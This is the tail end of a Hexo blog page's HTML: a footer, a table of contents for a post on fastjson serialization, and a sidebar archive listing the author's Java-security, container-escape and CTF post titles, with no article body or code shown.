    <!-- idea from: https://hexo.fluid-dev.com/posts/hexo-injector/#%E6%96%87%E7%AB%A0%E6%97%B6%E6%95%88%E6%80%A7%E6%8F%90%E7%A4%BA -->
    
    <!-- Mathjax -->
    
</main>

                <!-- profile -->
                
            </div>
            <footer class="footer footer-unloaded">
    <!-- social  -->
    
        <div class="social">
            
    
        
            
                <a href="mailto:12345@qq.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/azraelxuemo" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title=wechat>
                    
                    <img class="profile-qr" src="/assets/example_qr.png" />
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    


        </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- website approve for Chinese user -->
    
    <!-- 不蒜子  -->
    
        <div class="busuanzi-container">
            
             
                <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
            
        </div>
    	
</footer>

        </div>
        <!-- toc -->
        
            <div class="toc-wrapper toc-wrapper-loding" style=







    top:50vh;

>
                <div class="toc-catalog">
                    <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
                </div>
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">1.</span> <span class="toc-text">序列化</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#java%E5%8E%9F%E7%94%9F%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">1.1.</span> <span class="toc-text">java原生序列化</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E8%8E%B7%E5%8F%96"><span class="toc-number">1.1.1.</span> <span class="toc-text">信息获取</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%80%BC"><span class="toc-number">1.1.2.</span> <span class="toc-text">获取值</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fastjson%E6%8A%8A%E5%AF%B9%E8%B1%A1%E8%BD%AC%E5%8C%96%E4%B8%BAjson"><span class="toc-number">1.2.</span> <span class="toc-text">fastjson把对象转化为json</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E8%8E%B7%E5%8F%96-1"><span class="toc-number">1.2.1.</span> <span class="toc-text">信息获取</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%A4%84%E7%90%86methods"><span class="toc-number">1.2.1.1.</span> <span class="toc-text">处理methods</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%A4%84%E7%90%86fields"><span class="toc-number">1.2.1.2.</span> <span class="toc-text">处理fields</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%80%BC-1"><span class="toc-number">1.2.2.</span> <span class="toc-text">获取值</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#JavaBeanSerializer"><span class="toc-number">1.2.2.1.</span> <span class="toc-text">JavaBeanSerializer</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ASMSerializer"><span class="toc-number">1.2.2.2.</span> <span class="toc-text">ASMSerializer</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">1.3.</span> <span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%BB%86%E8%8A%82"><span class="toc-number">2.</span> <span class="toc-text">细节</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#getter%E7%9A%84%E8%B0%83%E7%94%A8%E9%A1%BA%E5%BA%8F"><span class="toc-number">2.1.</span> <span class="toc-text">getter的调用顺序</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#JavaBeanSerializer-1"><span class="toc-number">2.1.0.1.</span> <span class="toc-text">JavaBeanSerializer</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ASMSerializer-1"><span class="toc-number">2.1.0.2.</span> <span class="toc-text">ASMSerializer</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#fastjson-TemplatesImpl"><span class="toc-number">3.</span> <span class="toc-text">fastjson+TemplatesImpl</span></a></li></ol>
            </div>
        
        <!-- sidebar -->
        <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
        <div class="sidebar-panel-archives">
    <!-- 在 ejs 中将 archive 按照时间排序 -->
    
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 16
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
        
            
            
            <div class="archive-year"> 2023 </div>
            <ul class="year-list">
            
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/24</span>
            <a class="archive-post-title" href="/2023/12/24/qwb2023-chatting/">从fuzz视角看CTF堆题--qwb2023_chatting</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/23</span>
            <a class="archive-post-title" href="/2023/12/23/dnslog%E6%A3%80%E6%B5%8B%E8%BF%9C%E7%A8%8B%E4%BE%9D%E8%B5%96/">dnslog检测远程依赖</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/11</span>
            <a class="archive-post-title" href="/2023/12/11/fastjson%E5%BA%8F%E5%88%97%E5%8C%96/">fastjson序列化</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">12/03</span>
            <a class="archive-post-title" href="/2023/12/03/JNI/">JNI</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/29</span>
            <a class="archive-post-title" href="/2023/11/29/CVE-2022-21701%20yaml%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E/">CVE-2022-21701 yaml解析漏洞</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/26</span>
            <a class="archive-post-title" href="/2023/11/26/jndi/">jndi注入</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/24</span>
            <a class="archive-post-title" href="/2023/11/24/%E5%8A%A8%E6%80%81%E4%BB%A3%E7%90%86/">java动态代理</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/19</span>
            <a class="archive-post-title" href="/2023/11/19/CC%E9%93%BE/">CC链汇总</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/18</span>
            <a class="archive-post-title" href="/2023/11/18/%E5%BC%95%E7%94%A8%E7%BB%95%E8%BF%87/">java反序列化引用绕过</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/17</span>
            <a class="archive-post-title" href="/2023/11/17/CVE-2023-4357/">Chrome任意文件读->外带</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/16</span>
            <a class="archive-post-title" href="/2023/11/16/%E5%BA%8F%E5%88%97%E5%8C%96%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">java序列化\反序列化流程分析</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/15</span>
            <a class="archive-post-title" href="/2023/11/15/java%E5%88%9B%E9%80%A0%E5%AF%B9%E8%B1%A1/">java创造对象</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/14</span>
            <a class="archive-post-title" href="/2023/11/14/k8s/">k8s攻防</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/13</span>
            <a class="archive-post-title" href="/2023/11/13/%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8/">容器逃逸 All in One</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/12</span>
            <a class="archive-post-title" href="/2023/11/12/BUUCTF%E5%88%B7%E9%A2%98/">BUUCTF pwn刷题记录</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">11/11</span>
            <a class="archive-post-title" href="/index.html">Welcome</a>
        </li>
    
    </div>
</div>

        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
        
            <span class="sidebar-tag-name" data-tags="云安全">
                <span class="iconfont-archer">&#xe606;</span>
                云安全
            </span>
        
            <span class="sidebar-tag-name" data-tags="pwn">
                <span class="iconfont-archer">&#xe606;</span>
                pwn
            </span>
        
            <span class="sidebar-tag-name" data-tags="java">
                <span class="iconfont-archer">&#xe606;</span>
                java
            </span>
        
            <span class="sidebar-tag-name" data-tags="web">
                <span class="iconfont-archer">&#xe606;</span>
                web
            </span>
        
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
        缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98
    </div> 
    <div class="sidebar-tags-list"></div>
</div>

        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>

    </div>
</div>

        <!-- site-meta -->
        <script>
    var siteMetaRoot = "/"
    if (siteMetaRoot === "undefined") {
        siteMetaRoot = '/'
    }
    var siteMeta = {
        url: "https://azraelxuemo.github.io",
        root: siteMetaRoot,
        author: "azraelxuemo"
    }
</script>

        <!-- import experimental options here -->
        <!-- Custom Font -->


        <!-- main func -->
        <script src="/scripts/main.js?v=20211217"></script>
        <!-- dark mode -->
        <script src="/scripts/dark.js?v=20211217"></script>
        <!-- fancybox -->
        <script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" defer></script>
        <!-- algolia -->
        
        <!-- busuanzi -->
        
            <script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>
        
        <!-- CNZZ -->
        
        <!-- async load share.js -->
        
            <script src="/scripts/share.js?v=20211217" async></script>
        
        <!-- mermaid -->
        
    </body>
</html>
